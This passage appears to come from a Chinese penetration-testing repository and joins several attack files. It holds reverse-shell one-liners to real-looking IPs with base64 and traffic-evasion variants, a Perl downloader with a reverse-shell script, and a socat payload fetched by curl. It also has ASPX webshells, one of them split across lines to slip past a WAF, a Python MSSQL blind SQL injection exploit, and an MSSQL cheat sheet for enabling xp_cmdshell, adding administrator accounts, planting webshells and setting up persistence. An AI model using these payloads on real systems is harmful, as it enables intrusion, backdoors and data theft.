``` 51 | ### 参考链接: 52 | https://www.freebuf.com/vuls/211847.html 53 | https://saucer-man.com/information_security/233.html#cl-1 54 | 55 | 56 | 57 | perl反弹shell 58 | 用于生成下载脚本的bash命令: 59 | ``` 60 | echo use LWP::Simple\;\$url=\"http://1.1.1.1/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl 61 | ``` 62 | 执行后生成d.pl,再执行d.pl下载r.pl,r.pl(用于反连的perl脚本)如下: 63 | ``` 64 | use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"1.1.1.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}}; 65 | ``` 66 | 67 | #### perl有一个不调用bash的反弹shell 68 | 69 | 1、bash反弹shell 70 | attack执行:nc -lvp 2333 71 | victim执行: 72 | ``` 73 | bash -i >& /dev/tcp/1.1.1.1/2333 0>&1 74 | ``` 75 | # linux下bash反弹shell绕过流量检测设备 76 | ``` 77 | bash -c 'exec bash -i &>/dev/tcp/120.48.45.46/12345 <&1' 78 | 79 | bash -c bash${IFS}-i${IFS}>&/dev/tcp/120.48.45.46/12345<&1 80 | ``` 81 | 参考链接:https://blog.csdn.net/whatday/article/details/107098353 82 | 83 | 使用火狐浏览器插件HackTools生成base64编码后的反弹shell命令,替换下面的base64字符串 84 | ``` 85 | bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8zOS45OC4yNTAuNDcvMTIzNCAwPiYx}|{base64,-d}|{bash,-i} 86 | ``` 87 | 88 | ``` 89 | bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAwMCAwPiYx}|{base64,-d}|{bash,-i} 90 | 91 | 其中 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAwMCAwPiYx 是 bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 的base64编码 92 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/ASPX WebShell免杀/1.aspx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" Class="ObjectDataProviderSpy" %> 2 | <%@ Assembly Name="PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %> 3 | <%@ Assembly Name="WindowsBase,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %> 4 | using System; 5 | using System.Web; 6 | using System.Text; 7 | using System.Windows.Data; 8 | 9 | /// 10 | /// 注意:本程序仅供实验学习 ObjectDataProvider类,请勿违法滥用! 11 | /// 来源自.NET高级代码审计反序列化漏洞第12课 Gadget:ObjectDataProvider 12 | /// 链接:https://mp.weixin.qq.com/s/sHKR0zlW2CsphGAmv3_KVA 13 | /// 14 | public partial class ObjectDataProviderSpy : IHttpHandler 15 | { 16 | public bool IsReusable 17 | { 18 | get { return false; } 19 | } 20 | public static string EncodeBase64(string code_type, string code) 21 | { 22 | string encode = ""; 23 | byte[] bytes = Encoding.GetEncoding(code_type).GetBytes(code); 24 | try 25 | { 26 | encode = Convert.ToBase64String(bytes); 27 | } 28 | catch 29 | { 30 | encode = code; 31 | } 32 | return encode; 33 | } 34 | public static string DecodeBase64(string code_type, string code) 35 | { 36 | string decode = ""; 37 | byte[] bytes = Convert.FromBase64String(code); 38 | try 39 | { 40 | decode = Encoding.GetEncoding(code_type).GetString(bytes); 41 | } 42 | catch 43 | { 44 | decode = code; 45 | } 46 | return decode; 47 | } 48 | 49 | public static void CodeInject(string input) 50 | { 51 | string ExecCode = EncodeBase64("utf-8", input); 52 | ObjectDataProvider objectDataProvider = new ObjectDataProvider() 53 | { 54 | ObjectInstance = new System.Diagnostics.Process(), 55 | }; 56 | objectDataProvider.MethodParameters.Add("cmd.exe"); 57 | objectDataProvider.MethodParameters.Add("/c " + DecodeBase64("utf-8",ExecCode)); 58 | objectDataProvider.MethodName = "Start"; 59 | } 60 | 61 | public void ProcessRequest(HttpContext context) 62 | { 63 | context.Response.ContentType = "text/plain"; 64 | if (!string.IsNullOrEmpty(context.Request["input"])) 65 | { 66 | CodeInject(context.Request["input"]); 67 | context.Response.Write("Status: 执行完毕!"); 68 | } 69 | else 70 | { 71 | context.Response.Write("1. example: http://www.xxxxxxx.com/ObjectDataProviderSpy.ashx?input=calc.exe\n\n"); 72 | context.Response.Write("2. 程序调用cmd.exe/c calc.exe 执行命令,注意:本程序仅供实验学习 ObjectDataProvider类,请勿违法滥用!"); 73 | } 74 | } 75 | } -------------------------------------------------------------------------------- /04-漏洞利用/ASPX WebShell免杀/ObjectDataProviderGetTypeSpy.ashx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ASPX WebShell免杀/ObjectDataProviderGetTypeSpy.ashx -------------------------------------------------------------------------------- /04-漏洞利用/ASPX WebShell免杀/ObjectDataProvidertypeofSpy.ashx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ASPX WebShell免杀/ObjectDataProvidertypeofSpy.ashx -------------------------------------------------------------------------------- /04-漏洞利用/ASPX WebShell免杀/readme.md: -------------------------------------------------------------------------------- 1 | 如下aspx直接上传会被拦截 2 | ``` 3 | <%@ language = csharp %> 4 | <%@ Import Namespace = System.Reflection %> 5 | <%@ Import Namespace = System.Diagnostics %> 6 | <%@ Import Namespace =System.IO %> 7 | <% 8 | ProcessStartInfo mypsi = new ProcessStartInfo(); 9 | mypsi.FileName = "cmd.exe"; 10 | mypsi.Arguments = "/C " + Request.QueryString["pass"]; 11 | mypsi.RedirectStandardOutput = true; 12 | mypsi.UseShellExecute = false; 13 | Process p = Process.Start(mypsi); 14 | StreamReader stmrdr = p.StandardOutput; 15 | string s = stmrdr.ReadToEnd(); 16 | Response.Write(s); 17 | %> 18 | ``` 19 | 经换行分割后,语法上仍有效,且waf不拦截,代码如下 20 | ``` 21 | <% 22 | @ 23 | language 24 | = 25 | csharp 26 | %> 27 | <% 28 | @ 29 | Import 30 | Namespace 31 | = 32 | System.Reflection 33 | %> 34 | <% 35 | @ 36 | Import 37 | Namespace 38 | = 39 | System.Diagnostics 40 | %> 41 | <% 42 | @ 43 | Import 44 | Namespace 45 | = 46 | System.IO 47 | %> 48 | <% 49 | ProcessStartInfo 50 | mypsi 51 | = 52 | new 53 | ProcessStartInfo(); 54 | mypsi.FileName 55 | = 56 | "cmd.exe"; 57 | mypsi.Arguments 58 | = 59 | "/C " 60 | + 61 | Request.QueryString 62 | [ 63 | "pass" 64 | ]; 65 | mypsi.RedirectStandardOutput 66 | = 67 | true; 68 | mypsi.UseShellExecute 69 | = 70 | false; 71 | Process 72 | p 73 | = 74 | Process.Start(mypsi); 75 | StreamReader 76 | stmrdr 77 | = 78 | p.StandardOutput; 79 | string 80 | s 81 | = 82 | stmrdr.ReadToEnd(); 83 | Response.Write 84 | ( 85 | s 86 | ); 87 | %> 88 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/DNSLog自建.md: -------------------------------------------------------------------------------- 1 | 基于项目:https://github.com/lanyi1998/DNSlog-GO 2 | 3 | 下载到vps(ubuntu 18.04)上执行后报错:/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found,此时要么安装对应版本的库,要么在当前vps下重新编译 4 | 5 | 我选择重新编译,使用apt安装go环境,编译DNSlog-GO时会报错找不到库,可是库就在当前目录下啊,一番排查后发现,apt安装的go版本是1.10,这里涉及到一个环境变量GO111MODULE的知识点,总之go 1.10不能从当前目录下找到库,还是因为ubuntu 18.04版本太低了 6 | 7 | 重新从官方下载并安装1.18版本,配置环境变量,可成功编译 8 | 9 | 启动时发现53端口被占用,执行命令:systemctl stop systemd-resolved 10 | 11 | 阿里云购买一个域名:a.com,开始配置 12 | 添加一个A记录,名为ns,值为vps的ip地址 13 | 添加一个ns记录,名为log,值为ns.a.com(刚才添加的A记录) 14 | 15 | vps放行全部tcp、icmp、udp 16 | 17 | config.yaml中如下 18 | ``` 19 | HTTP: 20 | port: 30000 21 | # {"token":"用户对应子域名"} 22 | user: {"changbaishanlab": "red"} 23 | consoleDisable: false 24 | Dns: 25 | domain: log.changbaishanlab.online 26 | ``` 27 | 28 | 参考文章: 29 | https://www.f12bug.com/archives/dnslog平台搭建 30 | https://cn-sec.com/archives/1526334.html 31 | https://cloud.tencent.com/developer/article/1948254 -------------------------------------------------------------------------------- /04-漏洞利用/Linux下反弹Shell.md: -------------------------------------------------------------------------------- 1 | ### 2、判断目标是否向外通icmp流量 2 | ``` 3 | 方法1: 4 | 受害机上执行:ping -c 1 202.98.0.68>icmp.txt 5 | 受害机上执行:ls -alh 6 | 受害机上执行:cat icmp.txt 7 | 8 | 方法2: 9 | VPS上执行:tcpdump -i eth0 -n -v icmp|grep -i "length 93" 10 | Linux受害机上执行:ping -s 65 -c 1 xx.xx.xx.xx 11 | Windows受害机上执行:ping -l 65 -n 1 xx.xx.xx.xx 12 | ``` 13 | # 3、判断目标是否向外通dns流量 14 | ``` 15 | 方法1: 16 | 受害机上执行:ping -c 1 www.baidu.com>dns.txt 17 | 受害机上执行:ls -alh 18 | 受害机上执行:cat dns.txt 19 | 20 | 方法2: 21 | 反连平台dnslog.cn上生成一个子域名 22 | 受害机上执行:ping xxx.dnslog.cn 23 | 查看反连平台 24 | 25 | 想要修改hosts,经测试,如下这种是不行的: 26 | sudo echo "127.0.0.2 www.baidu.com" >> /etc/hosts 27 | 只能是在root用户下执行: 28 | echo "127.0.0.2 www.baidu.com" >> /etc/hosts 29 | ``` 30 | ### 3、判断目标向外通哪些端口 31 | ``` 32 | VPS上执行:nc -n -v -lp 3636 33 | 受害机上执行:curl http://xx.xx.xx.xx:3636 34 | ``` 35 | ### 4、反弹shell 36 | ``` 37 | bash反弹shell: 38 | VPS上执行:nc -n -v -lp 1024 39 | 受害机上执行:/bin/bash -i >& /dev/tcp//1024 0>&1 40 | 需要注意,当在URL地址栏或burp中进行命令注入利用时,需执行:/bin/bash -i %3E%26 /dev/tcp/xx.xx.xx.xx/1024 0%3E%261 41 | 42 | exec反弹shell:0<&196;exec 196<>/dev/tcp//1024; sh <&196 >&196 2>&196 43 | 44 | 其他反弹shell命令可通过浏览器插件Hack-Tools查看 45 | ``` 46 | ### 5、绕过流量审查反弹shell 47 | ``` 48 | 第一步,在VPS上生成SSL证书的公钥/私钥对: 49 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 50 | 第二步,VPS监听反弹shell: 51 | openssl s_server -quiet -key key.pem -cert cert.pem -port 443 52 | 第三步,受害机上用openssl加密反弹shell的流量: 53 | mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect xx.xx.xx.xx > /tmp/s;rm /tmp/s 54 | 此时,VPS上成功获取哑shell 55 | ``` 56 | ### 6、将哑shell变为功能齐全的交互式shell 57 | ``` 58 | 第一步,在哑shell中执行: 59 | python -c 'import pty;pty.spawn("/bin/bash")' 60 | 第二步:键入Ctrl-z,回到VPS的命令行中 61 | 第三步,在VPS中执行下述命令回到哑shell中: 62 | stty raw -echo 63 | fg 64 | 第四步,在哑shell中键入Ctrl-l,并执行: 65 | reset 66 | export SHELL=bash 67 | export TERM=xterm-256color 68 | stty rows 54 columns 104 69 | 此时,VPS上的shell为全功能的shell 70 | 71 | 如果拿到的shell执行Ctrl-z会退出会话,可考虑使用socat的方案: 72 | 73 | 攻击机: 74 | socat file:`tty`,raw,echo=0 tcp-listen:4444 75 | 受害机: 76 | curl -o /tmp/socat http://192.168.81.160:8000/socat 或者 wget -O /tmp/socat http://192.168.81.160:8000/socat 77 | chmod u+x /tmp/socat 78 | /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444 79 | 此时拿到的shell可以执行删除、可以选择历史命令、可以执行ctlr-c 80 | ``` 81 | ### 参考链接: 82 | https://www.freebuf.com/vuls/211847.html 83 | https://saucer-man.com/information_security/233.html#cl-1 84 | 85 | 86 | 87 | perl反弹shell 88 | 用于生成下载脚本的bash命令: 89 | ``` 90 | echo use LWP::Simple\;\$url=\"http://1.1.1.1/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl 91 | ``` 92 | 执行后生成d.pl,再执行d.pl下载r.pl,r.pl(用于反连的perl脚本)如下: 93 | ``` 94 | use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"1.1.1.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}}; 95 | ``` 96 | 97 | 1、bash反弹shell 98 | attack执行:nc -lvp 2333 99 | victim执行: 100 | ``` 101 | bash -i >& /dev/tcp/1.1.1.1/2333 0>&1 102 | ``` 103 | # linux下bash反弹shell绕过流量检测设备 104 | ``` 105 | bash -c 'exec bash -i &>/dev/tcp/120.48.45.46/12345 <&1' 106 | 107 | bash -c bash${IFS}-i${IFS}>&/dev/tcp/120.48.45.46/12345<&1 108 | ``` 109 | 参考链接:https://blog.csdn.net/whatday/article/details/107098353 -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/MSSQL-Boolean-Blind-EXP/mssql-boolean-blind-exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import requests 4 | import sys 5 | 6 | def convert_ascii_to_char(encoded_list): 7 | decoded_str = ""; 8 | for i in encoded_list: 9 | decoded_str += chr(i); 10 | return decoded_str; 11 | 12 | def http_request(new_url): 13 | r = requests.get(new_url); 14 | return r.status_code,len(r.text); 15 | 16 | #猜解数据库个数 17 | def guess_db_count(url): 18 | #猜解数据库个数 19 | db_payload_0 = "' and (select count(*) from master.dbo.sysdatabases)=7 and 'a'='a"; 20 | for i in range(1, 51): 21 | payload = "xxx" + str(i) + ""; 22 | new_url = url + payload; 23 | return_array = http_request(new_url); 24 | if return_array[0] == 500: 25 | print("return status code is 200, means internal server error"); 26 | exit(); 27 | elif return_array[0] == 404: 28 | print("return status code is 404, means not found"); 29 | exit(); 30 | elif return_array[0] == 403: 31 | print("return status code is 403, means forbidden"); 32 | exit(); 33 | elif return_array[0] == 200: 34 | print( "the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i) ); 35 | else: 36 | print("return status code is unknown"); 37 | exit(); 38 | 39 | #猜解指定数据库的字符数 40 | db_payload_1 = "' and (select COUNT(*) from master.dbo.sysdatabases where dbid=1 and LEN(name)=6)=1 and 'a'='a"; 41 | 42 | #猜解指定数据库的每个字符 43 | db_payload_2 = "' and ascii(substring((select name from master.dbo.sysdatabases where dbid=1),1,1))=1 and 'a'='a"; 44 | 45 | #猜解数据库名长度 46 | #def guess_db_name_length(url): 47 | 48 | #猜解数据库名 49 | #def guess_db_name(url): 50 | 51 | #猜解表个数 52 | def guess_table_count(url): 53 | #payload = "' and (select COUNT(*) from EWebNewsNET5.dbo.sysobjects where xtype='u')=1 and 'a'='a"; 54 | for i in range(1, 51): 55 | payload = "' and (select COUNT(*) from EWebNewsNET5.dbo.sysobjects where xtype='u')=" + str(i) + "and 'a'='a"; 56 | new_url = url + payload; 57 | return_array = http_request(new_url); 58 | if return_array[0] == 500: 59 | print("return status code is 200, means internal server error"); 60 | exit(); 61 | elif return_array[0] == 404: 62 | print("return status code is 404, means not found"); 63 | exit(); 64 | elif return_array[0] == 403: 65 | print("return status code is 403, means forbidden"); 66 | exit(); 67 | elif return_array[0] == 200: 68 | print( "Attempt " + str(i) + ": the length of the return text is: " + str(return_array[1]) + " and the payload is: " + str(i) ); 69 | else: 70 | print("return status code is unknown"); 71 | exit(); 72 | 73 | #猜解表名长度 74 | def guess_table_name_length(url): 75 | #payload = "' and len((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'))=9 and 'a'='a"; 76 | #for i in range(1, 22): 77 | for j in range(1, 51): 78 | payload = "' and len((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'))=" + str(j) + "and 'a'='a"; 79 | new_url = url + payload; 80 | return_array = http_request(new_url); 81 | if return_array[0] == 500: 82 | print("return status code is 200, means internal server error"); 83 | exit(); 84 | elif return_array[0] == 404: 85 | print("return status code is 404, means not found"); 86 | exit(); 87 | elif return_array[0] == 403: 88 | print("return status code is 403, means forbidden"); 89 | exit(); 90 | elif return_array[0] == 200: 91 | print( "Attempt " + str(j) + ": the length of the return text is: " + str(return_array[1]) + " and the payload is: " + str(j) ); 92 | else: 93 | print("return status code is unknown"); 94 | exit(); 95 | 96 | #猜解表名 97 | def guess_table_name(url, db_name): 98 | #payload = "' and ascii(substring((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'),1,1))=1 and 'a'='a"; 99 | #payload = ""; 100 | table_name = ""; 101 | for i in range(1, 7): 102 | with open("char-ascii.txt", "r") as f: 103 | lines = f.readlines(); 104 | for line in lines: 105 | j = line.strip("\n"); 106 | payload = "' and ascii(substring((select top 1 name from " + db_name + ".dbo.sysobjects where xtype='u')," + str(i) + ",1))='" + j + "' and 'a'='a"; 107 | new_url = url + payload; 108 | return_array = http_request(new_url); 109 | if return_array[0] == 500: 110 | print("return status code is 500, means internal server error"); 111 | exit(); 112 | elif return_array[0] == 404: 113 | print("return status code is 404, means not found"); 114 | exit(); 115 | elif return_array[0] == 403: 116 | print("return status code is 403, means forbidden"); 117 | exit(); 118 | elif return_array[0] == 200: 119 | print("Attempting character " + str(i) + " payload " + j); 120 | if return_array[1] != 15: 121 | table_name += chr( int(j) ); 122 | print(" Yes, the character " + chr( int(j) ) + " is where you need"); 123 | break; 124 | else: 125 | print("return status code is unknown"); 126 | exit(); 127 | print("Congratulation, The final table name is: " + table_name); 128 | 129 | #猜解字段数 130 | def guess_column_count(url): 131 | #猜解指定表的字段数 132 | column_payload = ""; 133 | for i in range(1, 51): 134 | payload = "xxx" + str(i) + ""; 135 | new_url = url + payload; 136 | return_array = http_request(new_url); 137 | if return_array[0] == 500: 138 | print("return status code is 200, means internal server error"); 139 | exit(); 140 | elif return_array[0] == 404: 141 | print("return status code is 404, means not found"); 142 | exit(); 143 | elif return_array[0] == 403: 144 | print("return status code is 403, means forbidden"); 145 | exit(); 146 | elif return_array[0] == 200: 147 | print( "the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i) ); 148 | else: 149 | print("return status code is unknown"); 150 | exit(); 151 | 152 | #猜解字段名长度 153 | #def guess_column_name_length(url): 154 | 155 | #猜解字段名 156 | #def guess_column_name(url): 157 | 158 | #猜解字段值个数 159 | def guess_value_count(url): 160 | #猜解指定数据库的指定表的指定字段的值个数 161 | value_payload = ""; 162 | for i in range(1, 51): 163 | payload = "xxx" + str(i) + ""; 164 | new_url = url + payload; 165 | return_array = http_request(new_url); 166 | if return_array[0] == 500: 167 | print("return status code is 200, means internal server error"); 168 | exit(); 169 | elif return_array[0] == 404: 170 | print("return status code is 404, means not found"); 171 | exit(); 172 | elif return_array[0] == 403: 173 | print("return status code is 403, means forbidden"); 174 | exit(); 175 | elif return_array[0] == 200: 176 | print( "the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i) ); 177 | else: 178 | print("return status code is unknown"); 179 | exit(); 180 | 181 | #猜解字段值长度 182 | #def guess_value_name_length(url): 183 | 184 | #猜解字段值 185 | #def guess_value_name(url): 186 | 187 | def main(): 188 | if len(sys.argv) != 2: 189 | print("Usage: below example is from linux"); 190 | print("Usage: python3 sqlserver-boolean-blind-exp.py http://www.example.com/index.php?id=5"); 191 | exit(); 192 | else: 193 | url = sys.argv[1]; 194 | 195 | db_names = ["EWebNewsNET5", "rykp"]; 196 | db_name = db_names[0]; 197 | guess_table_name(url, db_name); 198 | 199 | main(); 200 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/MSSQL-Boolean-Blind-EXP/readme.md: -------------------------------------------------------------------------------- 1 | 此exp是我之前在一个客户做渗透测试时,用于漏洞利用写的exp(exp仅包含我漏洞利用需要的部分,其他部分有待完善) 2 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/Oracle注入WAF绕过.md: -------------------------------------------------------------------------------- 1 | ``` 2 | https://iswin.org/2015/06/13/hack-oracle/#%E5%8F%8D%E5%BC%B9SHELL 3 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/SQLServer数据库攻击.md: -------------------------------------------------------------------------------- 1 | –取得所有数据库名 包括系统数据库 2 | –SELECT name FROM master.dbo.sysdatabases 3 | – 取得所有非系统数据库名 4 | –select [name] from master.dbo.sysdatabases where DBId>6 Order By [Name] 5 | –取所有信息,包括数据库文件地址 6 | –select * from master.dbo.sysdatabases where DBId>6 Order By [Name] 7 | 8 | 该条语句查询返回所有的用户表 9 | 10 | select * from sysobjects where xtype='u' 11 | 12 | 查询系统所有数据表信息 13 | 14 | select * from sysobjects 15 | 16 | 查看机器名 17 | select * from sys.servers 18 | 19 | 20 | 列目录 21 | exec master.dbo.xp_subdirs 'c:\’ 22 | 23 | exec master.dbo.xp_dirtree ‘c:’,1,1 db_owner权限可以执行 24 | 25 | exec master.dbo.xp_dirtree ‘c:/Program Files’,1,1 26 | 27 | 28 | 程序代码,写入webshell 29 | 30 | exec master.dbo.xp_subdirs ‘d:\web\www.xx.com’; 31 | exec sp_makewebtask ‘d:\web\www.XXXX.com\XX.asp’,'select”<%execute(request(“SB”))%>” 32 | 33 | 34 | 35 | execute master..xp_enumgroups 遍历系统用户 36 | 37 | execute master..xp_getnetname 获取当前机器名 38 | 39 | --列出服务器上固定驱动器,以及每个驱动器的可用空间 40 | execute master..xp_fixeddrives //dbo public 41 | 42 | execute xp_ntsec_enumdomains 43 | 44 | --创建个登陆mssql的帐号 45 | exec master.dbo.sp_addlogin name,pass;-- 46 | 47 | 48 | 49 | --列出服务器域名 50 | xp_ntsec_enumdomains //机器名 //dbo public 51 | 52 | --停止或者启动某个服务 53 | xp_servicecontrol 'stop','schedule' //schedule是服务得名称 //dbo 54 | 55 | --用pid来停止某个执行中的程序 56 | xp_terminate_process 123 //123是pid //dbo 57 | 58 | --只列某个目录下的子目录 59 | dbo.xp_subdirs 'C:' //dbo 60 | 61 | sql server 2005下开启xp_cmdshell的办法 62 | EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 63 | SQL2005开启'OPENROWSET'支持的方法: 64 | exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 65 | SQL2005开启'sp_oacreate'支持的方法: 66 | exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE 67 | 68 | 69 | sql server 2008下开启xp_cmdshell的方法 70 | 71 | -- To allow advanced options to be changed. 72 | EXEC sp_configure 'show advanced options', 1 73 | GO 74 | -- To update the currently configured value for advanced options. 75 | RECONFIGURE 76 | GO 77 | -- To enable the feature. 78 | EXEC sp_configure 'xp_cmdshell', 1 79 | GO 80 | -- To update the currently configured value for this feature. 81 | RECONFIGURE 82 | GO 83 | 84 | exec xp_cmdshell 'ipconfig' 85 | 86 | 今天想到修改下数据库服务器的sa登陆密码,可突然忘记了,只好借助其他账户打开查询分析器修改sa的密码了,很简单: 87 | 88 | 执行: 89 | sp_password Null,'teracypwd,'sa' 90 | 把SA的密码设为“teracypwd” 91 | 92 | 执行成功后有“Command(s) completed successfully.” OK! 93 | 94 | 95 | 96 | 97 | 在db权限并且分离获取mssql数据库服务器ip的方法 98 | 99 | 1.本地nc监听 nc -vvlp 80 100 | 101 | 2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;-- 102 | 103 | select * from openrowset('sqloledb','server=125.110.145.130,6789;uid=sa;pwd=zhu','select user;') 104 | 105 | 106 | 107 | xp_cmdshell的删除及恢复 108 | 109 | 恢复xp_cmdshell的方法 110 | 删除扩展存储过过程xp_cmdshell的语句 111 | exec sp_dropextendedproc ’xp_cmdshell’ 112 | 113 | 恢复cmdshell的sql语句 114 | exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ 115 | 116 | exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and 117 | 返回结果为1就ok 118 | 119 | 否则需上传c:\inetput\web\xplog70.dll后 120 | exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;-- 121 | 122 | 如果是用以下方法删除 123 | drop procedure sp_addextendedproc 124 | drop procedure sp_oacreate 125 | exec sp_dropextendedproc ’xp_cmdshell’ 126 | 127 | 则可以用以下语句恢复 128 | dbcc addextendedproc ("sp_oacreate","odsole70.dll") 129 | dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 130 | 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 131 | 132 | 133 | 134 | 1、用xp_cmdshell: 135 | exec master.dbo.xp_cmdshell "net user admin admin /add" 136 | exec master.dbo.xp_cmdshell "net localgroup administrators admin /add" 137 | 2、无xp_cmdshell情况下,用sp_oacreate跟sp_oamethod: 138 | declare @object int 139 | exec sp_oacreate 'wscript.Shell',@object out 140 | exec sp_oamethod @object,'Run',NULL,'net user admin admin /add' 141 | exec sp_oamethod @object,'Run',NULL,'net localgroup Administrators admin /add' 142 | 注:regsvr32 /s c:\windows\system32\wshom.ocx 启动wscript.shell 143 | 3、用sp_oacreate跟FSO 144 | declare @o int 145 | exec sp_oacreate 'scripting.filesystemobject', @o out 146 | exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; 147 | declare @oo int 148 | exec sp_oacreate 'scripting.filesystemobject', @oo out 149 | exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\ 150 | system32\dllcache\sethc.exe'; 151 | 4、用xp_regwrite (db_owner,需重启): 152 | exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\currentversion\ 153 | run','eadd1','reg_sz','net user admin admin /add' 154 | exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\currentversion\ 155 | run','eadd2','reg_sz','net localgroup administrators admin /add' 156 | 5、用sp_add_job: 157 | exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' 158 | use msdb exec sp_delete_job null,'x' 159 | exec sp_add_job 'x' 160 | exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user admin admin /add' 161 | exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x' 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 很多人SA直接用沙盒模式成功了好多机器,但我从来没实践过,也不太清楚成功率如何。当扩展被删除时,先恢复对注册表的读写存储。 170 | dbcc addextendedproc ('xp_regread','xpstar.dll') 171 | dbcc addextendedproc ('xp_regwrite','xpstar.dll') 172 | 173 | 修复沙盒的保护模式 174 | exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;-- 175 | 176 | 查看'SandBoxMode'值是否已经变成0了。 177 | 178 | exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode' 179 | 180 | 最后调用沙盒模式 181 | select * from openrowset('microsoft.jet.oledb.4.0',';database=C:\WINDOWS\system32\ias\dnary.mdb','select shell("cmd.exe /c net user user passwd /add")') 182 | 183 | 184 | 185 | 1、如果沙盒保护模式未“关闭”,会报错: 186 | 服务器: 消息 7357,级别 16,状态 2,行 1 187 | 未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。 188 | OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object has nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。 189 | 190 | 2、如果.mdb不存在或是输入路径错误 191 | 服务器: 消息 7399,级别 16,状态 1,行 1 192 | OLE DB 提供程序 'microsoft.jet.oledb.4.0' 报错。 193 | [OLE/DB provider returned message: 找不到文件 'C:\WINDOWS\system32\ias\dnary1.mdb'。] 194 | OLE DB 错误跟踪[OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: ]。 195 | 196 | 3、如果输入过程中多了一些空格,也会报错。尤其要注意这点,很多人直接网上找文章复制粘贴进去执行。 197 | 服务器: 消息 7357,级别 16,状态 2,行 1 198 | 未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。 199 | OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object has nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。 200 | 201 | 4、如果mdb权限和cmd.exe权限不对,同样会也出现问题。 202 | 当mdb权限不对时, 203 | 服务器: 消息 7320,级别 16,状态 2,行 1 204 | 未能对 OLE DB 提供程序 